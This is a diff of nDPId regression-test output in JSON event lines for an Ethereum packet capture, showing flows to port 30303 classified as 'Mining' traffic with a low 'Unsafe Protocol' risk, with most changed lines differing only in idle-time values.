+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 